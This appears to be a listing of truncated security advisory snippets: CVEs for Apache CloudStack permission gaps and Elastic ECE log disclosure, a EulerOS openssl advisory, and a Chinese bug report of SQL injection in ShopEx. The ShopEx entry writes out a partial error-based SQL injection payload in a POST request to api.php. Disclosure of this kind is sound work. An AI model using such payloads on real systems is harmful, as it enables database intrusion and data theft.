CVE-2025-59454 Apache CloudStack: Lack of user permission validation leading to data leak for few APIs

In Apache CloudStack, a gap in access control checks affected the APIs - createNetworkACL - listNetworkACLs - listResourceDetails - listVirtualMachinesUsageHistory - listVolumesUsageHistory While these APIs were accessible only to authorized users, insufficient permission validation meant that...

CVE-2022-23715

A flaw was discovered in ECE before 3.4.0 that might lead to the disclosure of sensitive information such as user passwords and Elasticsearch keystore settings values in logs such as the audit log or deployment logs in the Logging and Monitoring cluster. The affected APIs are PATCH /api/v1/user a...

EulerOS 2.0 SP10 : openssl (EulerOS-SA-2025-1026)

According to the versions of the openssl packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : Issue summary: Use of the low-level GF2^m elliptic curve APIs with untrusted explicit values for the field polynomial can lead to out-of-bounds...

ShopEx最新版多处SQL注射

简要描述： 不知道我有不有搞错，但已经尽量下载了最新版了。。。 在很多地方测试都存在。。。 ShopEx最新版多处SQL注射 详细说明： 我很怀疑自己是不是搞错呢。。。 注射1： http://127.0.0.1:5656/shopex/api.php POST act=searchsubregions&apiversion=1.0&returndata=string&pregionid=22 and select 1 fromselect count,concat0x7c,select Select version from informationschema.tables limit...